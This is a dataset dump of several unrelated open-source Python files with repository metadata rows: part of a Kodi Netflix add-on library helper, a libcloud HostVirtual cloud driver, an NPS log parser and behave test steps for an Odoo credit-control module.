titledb = tvshow['label'].encode('ascii', 'ignore')
titledb = re.sub(
pattern=r'[?|$|!|:|#|\.|\,|\'| ]',
repl=r'',
string=titledb).lower().replace('-', '')
if '(' in titledb:
titledb = titledb.split('(')[0]
titlegiven = title.encode('ascii', 'ignore')
titlegiven = re.sub(
pattern=r'[?|$|!|:|#|\.|\,|\'| ]',
repl=r'',
string=titlegiven).lower().replace('-', '')
if '(' in titlegiven:
titlegiven = titlegiven.split('(')[0]
if titledb == titlegiven:
return tvshow['tvshowid'], tvshow['genre']
return '-1', ''
except Exception:
return '-1', ''
def get_show_content_by_id(self, showid, showseason, showepisode):
showseason = int(showseason)
showepisode = int(showepisode)
props = ["title", "showtitle", "season", "episode", "plot", "fanart",
"art", "resume", "playcount"]
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetEpisodes",
"params": {
"properties": props,
"tvshowid": int(showid[0])
},
"id": "1"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
result = json_result.get('result', None)
if result is not None and 'episodes' in result:
result = result['episodes']
for episode in result:
in_season = episode['season'] == showseason
in_episode = episode['episode'] == showepisode
if in_season and in_episode:
infos = {'mediatype': 'episode',
'dbid': episode['episodeid'],
'tvshowtitle': episode['showtitle'],
'title': episode['title']}
if episode['resume']['position'] > 0:
infos['resume'] = episode['resume']['position']
infos.update({'playcount': episode.get('playcount', 0),
'plot': episode['plot'],
'genre': showid[1]}
if episode.get('plot') else {})
art = {}
art.update({'fanart': episode['fanart']}
if episode.get('fanart') else {})
if 'art' in episode:
_update_if_present(source_dict=episode['art'],
source_att='thumb',
target_dict=art,
target_att='thumb')
_update_if_present(source_dict=episode['art'],
source_att='tvshow.poster',
target_dict=art,
target_att='poster')
_update_if_present(source_dict=episode['art'],
source_att='tvshow.banner',
target_dict=art,
target_att='banner')
return infos, art
return False
except Exception:
return False
def get_movie_content_by_id(self, movieid):
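# fetch details of an already-exported movie from the Kodi video library via JSON-RPC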
query = {
"jsonrpc": "2.0",
"method": "VideoLibrary.GetMovieDetails",
"params": {
"movieid": movieid,
"properties": [
"title",
"genre",
"plot",
"fanart",
"thumbnail",
"art",
"resume",
"playcount"]
},
"id": "libMovies"
}
try:
rpc_result = xbmc.executeJSONRPC(
jsonrpccommand=json.dumps(query, encoding='utf-8'))
json_result = json.loads(rpc_result)
result = json_result.get('result', None)
if result is not None and 'moviedetails' in result:
result = result.get('moviedetails', {})
infos = {'mediatype': 'movie', 'dbid': movieid,
'title': result['title'],
'playcount': result.get('playcount', 0)}
if result.get('resume', {}).get('position', 0) > 0:
infos.update({'resume': result['resume']['position']})
if 'genre' in result and len(result['genre']) > 0:
infos.update({'genre': result['genre']})
if 'plot' in result and len(result['plot']) > 0:
infos.update({'plot': result['plot']})
art = {}
if 'fanart' in result and len(result['fanart']) > 0:
art.update({'fanart': result['fanart']})
if 'thumbnail' in result and len(result['thumbnail']) > 0:
art.update({'thumb': result['thumbnail']})
if 'art' in result and len(result['art'].get('poster', '')) > 0:
art.update({'poster': result['art']['poster']})
return infos, art
return False
except Exception:
return False
def get_local_string(self, string_id):
"""Returns the localized version of a string
Parameters
----------
string_id : :obj:`int`
ID of the string that should be fetched
Returns
-------
:obj:`str`
Requested string or empty string
"""
src = xbmc if string_id < 30000 else self.nx_common.get_addon()
locString = src.getLocalizedString(string_id)
if isinstance(locString, unicode):
locString = locString.encode('utf-8')
return locString
def track_event(self, event):
"""
Send a tracking event if tracking is enabled
:param event: the string identifier of the event
:return: None
"""
# Check if tracking is enabled
enable_tracking = (self.nx_common.get_setting('enable_tracking') == 'true')
if enable_tracking:
# Get or Create Tracking id
tracking_id = self.nx_common.get_setting('tracking_id')
if tracking_id == '':
tracking_id = str(uuid4())
self.nx_common.set_setting('tracking_id', tracking_id)
# Send the tracking event
tracker = Tracker.create('UA-46081640-5', client_id=tracking_id)
tracker.send('event', event)
| gpl-2.0 | -867,985,303,682,476,900 | 38.27705 | 965 | 0.535646 | false |
SecurityCompass/libcloud | libcloud/compute/drivers/hostvirtual.py | 18 | 13880 | # Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
libcloud driver for the Host Virtual Inc. (VR) API
Home page https://www.hostvirtual.com/
"""
import time
import re
try:
import simplejson as json
except ImportError:
import json
from libcloud.common.hostvirtual import HostVirtualResponse
from libcloud.common.hostvirtual import HostVirtualConnection
from libcloud.common.hostvirtual import HostVirtualException
from libcloud.compute.providers import Provider
from libcloud.compute.types import NodeState
from libcloud.compute.base import Node, NodeDriver
from libcloud.compute.base import NodeImage, NodeSize, NodeLocation
from libcloud.compute.base import NodeAuthSSHKey, NodeAuthPassword
API_ROOT = ''
NODE_STATE_MAP = {
'BUILDING': NodeState.PENDING,
'PENDING': NodeState.PENDING,
'RUNNING': NodeState.RUNNING, # server is powered up
'STOPPING': NodeState.REBOOTING,
'REBOOTING': NodeState.REBOOTING,
'STARTING': NodeState.REBOOTING,
'TERMINATED': NodeState.TERMINATED, # server is powered down
'STOPPED': NodeState.STOPPED
}
DEFAULT_NODE_LOCATION_ID = 21
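# fallback datacenter id used by create_node when no location is supplied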
class HostVirtualComputeResponse(HostVirtualResponse):
pass
class HostVirtualComputeConnection(HostVirtualConnection):
responseCls = HostVirtualComputeResponse
class HostVirtualNodeDriver(NodeDriver):
type = Provider.HOSTVIRTUAL
name = 'HostVirtual'
website = 'http://www.hostvirtual.com'
connectionCls = HostVirtualComputeConnection
features = {'create_node': ['ssh_key', 'password']}
def __init__(self, key, secure=True, host=None, port=None):
self.location = None
super(HostVirtualNodeDriver, self).__init__(key=key, secure=secure,
host=host, port=port)
def list_nodes(self):
try:
result = self.connection.request(
API_ROOT + '/cloud/servers/').object
except HostVirtualException:
return []
nodes = []
for value in result:
node = self._to_node(value)
nodes.append(node)
return nodes
def list_locations(self):
result = self.connection.request(API_ROOT + '/cloud/locations/').object
locations = []
for dc in result:
locations.append(NodeLocation(
dc["id"],
dc["name"],
dc["name"].split(',')[1].replace(" ", ""), # country
self))
return locations
def list_sizes(self, location=None):
params = {}
if location is not None:
params = {'location': location.id}
result = self.connection.request(
API_ROOT + '/cloud/sizes/',
params=params).object
sizes = []
for size in result:
n = NodeSize(id=size['plan_id'],
name=size['plan'],
ram=size['ram'],
disk=size['disk'],
bandwidth=size['transfer'],
price=size['price'],
driver=self.connection.driver)
sizes.append(n)
return sizes
def list_images(self):
result = self.connection.request(API_ROOT + '/cloud/images/').object
images = []
for image in result:
i = NodeImage(id=image["id"],
name=image["os"],
driver=self.connection.driver,
extra=image)
del i.extra['id']
del i.extra['os']
images.append(i)
return images
def create_node(self, name, image, size, **kwargs):
"""
Creates a node
Example of node creation with ssh key deployed:
>>> from libcloud.compute.base import NodeAuthSSHKey
>>> key = open('/home/user/.ssh/id_rsa.pub').read()
>>> auth = NodeAuthSSHKey(pubkey=key)
>>> from libcloud.compute.providers import get_driver;
>>> driver = get_driver('hostvirtual')
>>> conn = driver('API_KEY')
>>> image = conn.list_images()[1]
>>> size = conn.list_sizes()[0]
>>> location = conn.list_locations()[1]
>>> name = 'markos-dev.example.com'
>>> node = conn.create_node(name, image, size, auth=auth,
>>> location=location)
"""
dc = None
auth = self._get_and_check_auth(kwargs.get('auth'))
if not self._is_valid_fqdn(name):
raise HostVirtualException(
500, "Name should be a valid FQDN (e.g, hostname.example.com)")
# simply order a package first
pkg = self.ex_order_package(size)
if 'location' in kwargs:
dc = kwargs['location'].id
else:
dc = DEFAULT_NODE_LOCATION_ID
# create a stub node
stub_node = self._to_node({
'mbpkgid': pkg['id'],
'status': 'PENDING',
'fqdn': name,
'plan_id': size.id,
'os_id': image.id,
'location_id': dc
})
# provisioning a server using the stub node
self.ex_provision_node(node=stub_node, auth=auth)
node = self._wait_for_node(stub_node.id)
if getattr(auth, 'generated', False):
node.extra['password'] = auth.password
return node
def reboot_node(self, node):
params = {'force': 0, 'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/reboot',
data=json.dumps(params),
method='POST').object
return bool(result)
def destroy_node(self, node):
params = {
'mbpkgid': node.id,
# 'reason': 'Submitted through Libcloud API'
}
result = self.connection.request(
API_ROOT + '/cloud/cancel', data=json.dumps(params),
method='POST').object
return bool(result)
def ex_list_packages(self):
"""
List the server packages.
"""
try:
result = self.connection.request(
API_ROOT + '/cloud/packages/').object
except HostVirtualException:
return []
pkgs = []
for value in result:
pkgs.append(value)
return pkgs
def ex_order_package(self, size):
"""
Order a server package.
:param size: Size (plan) of the server package to order
:type size: :class:`NodeSize`
:rtype: ``dict``
"""
params = {'plan': size.name}
pkg = self.connection.request(API_ROOT + '/cloud/buy/',
data=json.dumps(params),
method='POST').object
return pkg
def ex_cancel_package(self, node):
"""
Cancel a server package.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``str``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(API_ROOT + '/cloud/cancel/',
data=json.dumps(params),
method='POST').object
return result
def ex_unlink_package(self, node):
"""
Unlink a server package from location.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``str``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(API_ROOT + '/cloud/unlink/',
data=json.dumps(params),
method='POST').object
return result
def ex_get_node(self, node_id):
"""
Get a single node.
:param node_id: id of the node that we need the node object for
:type node_id: ``str``
:rtype: :class:`Node`
"""
params = {'mbpkgid': node_id}
result = self.connection.request(
API_ROOT + '/cloud/server', params=params).object
node = self._to_node(result)
return node
def ex_stop_node(self, node):
"""
Stop a node.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``bool``
"""
params = {'force': 0, 'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/shutdown',
data=json.dumps(params),
method='POST').object
return bool(result)
def ex_start_node(self, node):
"""
Start a node.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``bool``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/start',
data=json.dumps(params),
method='POST').object
return bool(result)
def ex_provision_node(self, **kwargs):
"""
Provision a server on a VR package and get it booted
:keyword node: node which should be used
:type node: :class:`Node`
:keyword image: The distribution to deploy on your server (mandatory)
:type image: :class:`NodeImage`
:keyword auth: an SSH key or root password (mandatory)
:type auth: :class:`NodeAuthSSHKey` or :class:`NodeAuthPassword`
:keyword location: which datacenter to create the server in
:type location: :class:`NodeLocation`
:return: Node representing the newly built server
:rtype: :class:`Node`
"""
node = kwargs['node']
if 'image' in kwargs:
image = kwargs['image']
else:
image = node.extra['image']
params = {
'mbpkgid': node.id,
'image': image,
'fqdn': node.name,
'location': node.extra['location'],
}
auth = kwargs['auth']
ssh_key = None
password = None
if isinstance(auth, NodeAuthSSHKey):
ssh_key = auth.pubkey
params['ssh_key'] = ssh_key
elif isinstance(auth, NodeAuthPassword):
password = auth.password
params['password'] = password
if not ssh_key and not password:
raise HostVirtualException(
500, "SSH key or Root password is required")
try:
result = self.connection.request(API_ROOT + '/cloud/server/build',
data=json.dumps(params),
method='POST').object
return bool(result)
except HostVirtualException:
self.ex_cancel_package(node)
def ex_delete_node(self, node):
"""
Delete a node.
:param node: Node which should be used
:type node: :class:`Node`
:rtype: ``bool``
"""
params = {'mbpkgid': node.id}
result = self.connection.request(
API_ROOT + '/cloud/server/delete', data=json.dumps(params),
method='POST').object
return bool(result)
def _to_node(self, data):
state = NODE_STATE_MAP[data['status']]
public_ips = []
private_ips = []
extra = {}
if 'plan_id' in data:
extra['size'] = data['plan_id']
if 'os_id' in data:
extra['image'] = data['os_id']
if 'fqdn' in data:
extra['fqdn'] = data['fqdn']
if 'location_id' in data:
extra['location'] = data['location_id']
if 'ip' in data:
public_ips.append(data['ip'])
node = Node(id=data['mbpkgid'], name=data['fqdn'], state=state,
public_ips=public_ips, private_ips=private_ips,
driver=self.connection.driver, extra=extra)
return node
def _wait_for_node(self, node_id, timeout=30, interval=5.0):
"""
:param node_id: ID of the node to wait for.
:type node_id: ``int``
:param timeout: Timeout (in seconds).
:type timeout: ``int``
:param interval: How long to wait (in seconds) between each attempt.
:type interval: ``float``
:return: Node representing the newly built server
:rtype: :class:`Node`
"""
# poll until we get a node
for i in range(0, timeout, int(interval)):
try:
node = self.ex_get_node(node_id)
return node
except HostVirtualException:
time.sleep(interval)
raise HostVirtualException(412, 'Timeout on getting node details')
def _is_valid_fqdn(self, fqdn):
if len(fqdn) > 255:
return False
if fqdn[-1] == ".":
fqdn = fqdn[:-1]
valid = re.compile("(?!-)[A-Z\d-]{1,63}(?<!-)$", re.IGNORECASE)
if len(fqdn.split(".")) > 1:
return all(valid.match(x) for x in fqdn.split("."))
else:
return False
| apache-2.0 | -3,985,527,973,936,344,600 | 29.91314 | 79 | 0.5433 | false |
nomadpenguins/opeNPSnake | lib/fileParser.py | 1 | 4326 | import os
front_extra = ' data_type="4">' #Needed for parsing xml values, the front tags end
back_extra = '</' #Needed for parsing xml values, the back tags front
#Gets the xml values from the logs
#Expects the line of text from the log, the starting <' '> tag and ending </' '> tag
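#Example: for the fragment '<Packet-Type data_type="4">4</Packet-Type>',
#get_xml_value(line, 'Packet-Type', '</Packet-Type') returns '4'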
def get_xml_value(line, start_tag, end_tag):
x = line.find(start_tag)
if x == -1: #Returns N/A if that tag isn't there
return "N/A"
x += len(start_tag + front_extra)
y = line.find(end_tag)
return line[x:y]
#Parses the files and pulls the desired values
def parseFiles(inputDir, parameters):
values, count = [], []
for file in os.listdir(inputDir):
if file.endswith('.log'):
print("Parsing data from file: " + file)
inputFile = open(inputDir + file)
lines = inputFile.readlines() #List of lines in the file
for line in lines:
#Temp variable to store the values that will be reported
values_temp = []
#Boolean for checking if a filter has been broken
#False = the values get reported
#True = A filter has been broken
broken_filter = False
for param in parameters:
#The front <' '> tag
start_tag = param
#The back </' '> tag
end_tag = back_extra + param
#temp storage for the values
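#'User-Name' keeps its leading '<' so the search matches the exact tag and not other tags whose names merely contain 'User-Name'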
if param == 'User-Name':
xml_value = get_xml_value(line, '<'+start_tag, end_tag)
else:
xml_value = get_xml_value(line, start_tag, end_tag)
#Checks to see if it gets passed the filter or there is no filter
for filt in parameters[param]:
if filt == xml_value:
values_temp.append(xml_value)
if filt[:1] == '!':
if filt[1:] == xml_value:
broken_filter = True
elif filt[1:] != xml_value:
values_temp.append(xml_value)
if len(parameters[param]) <= 0:
values_temp.append(xml_value)
if len(values_temp) < len(parameters):
broken_filter = True
if not broken_filter:
#Checks to see if this is a duplicate line
if values_temp not in values:
values.append(values_temp)
count.append(1)
#Adds one to count if it is
else:
index = values.index(values_temp)
count[index] += 1
inputFile.close()
return values, count
#Parses the files for possible parameter types
def checkFilesForParameters(inputDir):
possible_params = []
for file in os.listdir(inputDir):
if file.endswith('.log'):
inputfile = open(inputDir + file)
#List that holds all the lines in the file
lines = inputfile.readlines()
#temp variable to hold a place in a line so we progress through the line
lastindex = 0
for line in lines:
while lastindex != -1:
#Where the last item was
lastindex = line.find(back_extra, lastindex)
#Next items first <' '>
fbracket = int(line.find(back_extra, lastindex)) + 2
#Next items second </' '>
sbracket = int(line.find('>', lastindex))
#Break if there are no more values
if sbracket == -1:
break
param = line[fbracket:sbracket]
#No duplicates
if param not in possible_params:
possible_params.append(param)
lastindex+=1
inputfile.close()
#These parameters either break parsing or are specified through another cmdline argument
for param in ["Timestamp", "Event"]:
possible_params.remove(param)
return possible_params | apache-2.0 | 8,217,820,993,465,716,000 | 44.072917 | 85 | 0.495377 | false |
yvaucher/account-financial-tools | __unported__/account_credit_control/scenarios/features/steps/account_credit_control.py | 3 | 6507 | import time
from behave import given, then, when
from support import model
@given(u'I configure the following accounts on the credit control policy with oid: "{policy_oid}"')
def impl(ctx, policy_oid):
policy = model('credit.control.policy').get(policy_oid)
assert policy, 'No policy %s found' % policy_oid
acc_obj = model('account.account')
accounts = []
for row in ctx.table:
acc = acc_obj.get(['code = %s' % row['account code']])
assert acc, "Account with code %s not found" % row['account code']
accounts.append(acc)
policy.write({'account_ids': [x.id for x in accounts]})
@when(u'I launch the credit run')
def impl(ctx):
assert ctx.found_item
# Must be a cleaner way to do it
assert 'credit.control.run' == ctx.found_item._model._name
ctx.found_item.generate_credit_lines()
@given(u'I clean all the credit lines')
def impl(ctx):
model('credit.control.line').browse([]).unlink()
@then(u'my credit run should be in state "done"')
def impl(ctx):
assert ctx.found_item
# Must be a cleaner way to do it
assert model("credit.control.run").get(ctx.found_item.id).state == 'done'
@then(u'the generated credit lines should have the following values')
def impl(ctx):
def _row_to_dict(row):
return dict((name, row[name]) for name in row.headings if row[name])
rows = map(_row_to_dict, ctx.table)
def _parse_date(value):
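# values containing '%' are treated as strftime patterns evaluated against today's date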
return time.strftime(value) if '%' in value else value
for row in rows:
account = model('account.account').get(['name = %s' % row['account']])
assert account, "no account named %s found" % row['account']
policy = model('credit.control.policy').get(['name = %s' % row['policy']])
assert policy, "No policy %s found" % row['policy']
partner = model('res.partner').get(['name = %s' % row['partner']])
assert partner, "No partner %s found" % row['partner']
maturity_date = _parse_date(row['date due'])
move_line = model('account.move.line').get(['name = %s' % row['move line'],
'date_maturity = %s' % maturity_date])
assert move_line, "No move line %s found" % row['move line']
level = model('credit.control.policy.level').get(['name = %s' % row['policy level'],
'policy_id = %s' % policy.id])
assert level, "No level % found" % row['policy level']
domain = [['account_id', '=', account.id],
['policy_id', '=', policy.id],
['partner_id', '=', partner.id],
['policy_level_id', '=', level.id],
['amount_due', '=', row.get('amount due', 0.0)],
['state', '=', row['state']],
['level', '=', row.get('level', 0.0)],
['channel', '=', row['channel']],
['balance_due', '=', row.get('balance', 0.0)],
['date_due', '=', _parse_date(row['date due'])],
['date', '=', _parse_date(row['date'])],
['move_line_id', '=', move_line.id],
]
if row.get('currency'):
currency = model('res.currency').get(['name = %s' % row['currency']])
assert currency, "No currency %s found" % row['currency']
domain.append(('currency_id', '=', currency.id))
lines = model('credit.control.line').search(domain)
assert lines, "no line found for %s" % repr(row)
assert len(lines) == 1, "Too many lines found for %s" % repr(row)
date_lines = model('credit.control.line').search([('date', '=', ctx.found_item.date)])
assert len(date_lines) == len(ctx.table.rows), "Too many lines generated"
def open_invoice(ctx):
assert ctx.found_item
ctx.found_item._send('invoice_open')
# _send refresh object
assert ctx.found_item.state == 'open'
@then(u'I open the credit invoice')
def impl(ctx):
open_invoice(ctx)
@given(u'I open the credit invoice')
def impl(ctx):
open_invoice(ctx)
@given(u'there is "{state}" credit lines')
def impl(ctx, state):
assert model('credit.control.line').search(['state = %s' % state])
@given(u'I mark all draft email to state "{state}"')
def impl(ctx, state):
wiz = model('credit.control.marker').create({'name': state})
lines = model('credit.control.line').search([('state', '=', 'draft')])
assert lines
ctx.lines = lines
wiz.write({'line_ids': lines})
wiz.mark_lines()
@then(u'the draft line should be in state "{state}"')
def impl(ctx, state):
assert ctx.lines
lines = model('credit.control.line').search([('state', '!=', state),
('id', 'in', ctx.lines)])
assert not lines
@given(u'I ignore the "{partner}" credit line at level "{level:d}" for move line "{move_line_name}" with amount "{amount:f}"')
def impl(ctx, partner, level, move_line_name, amount):
print ctx, partner, level, move_line_name, amount
to_ignore = model('credit.control.line').search([('partner_id.name', '=', partner),
('level', '=', level),
('amount_due', '=', amount),
('move_line_id.name', '=', move_line_name)])
assert to_ignore
wiz = model('credit.control.marker').create({'name': 'ignored'})
ctx.lines = to_ignore
wiz.write({'line_ids': to_ignore})
wiz.mark_lines()
assert model('credit.control.line').get(to_ignore[0]).state == 'ignored'
@given(u'I have for "{partner}" "{number:d}" credit lines at level "{level:d}" for move line "{move_line_name}" with amount "{amount:f}" respectively in state "draft" and "ignored"')
def impl(ctx, partner, number, level, move_line_name, amount):
to_check = model('credit.control.line').search([('partner_id.name', '=', partner),
('level', '=', level),
('amount_due', '=', amount),
('move_line_id.name', '=', move_line_name),
('state', 'in', ('draft', 'ignored'))])
assert len(to_check) == int(number), "More than %s found" % number
lines = model('credit.control.line').browse(to_check)
assert set(['ignored', 'draft']) == set(lines.state)
| agpl-3.0 | -6,258,230,944,134,524,000 | 43.875862 | 182 | 0.549255 | false |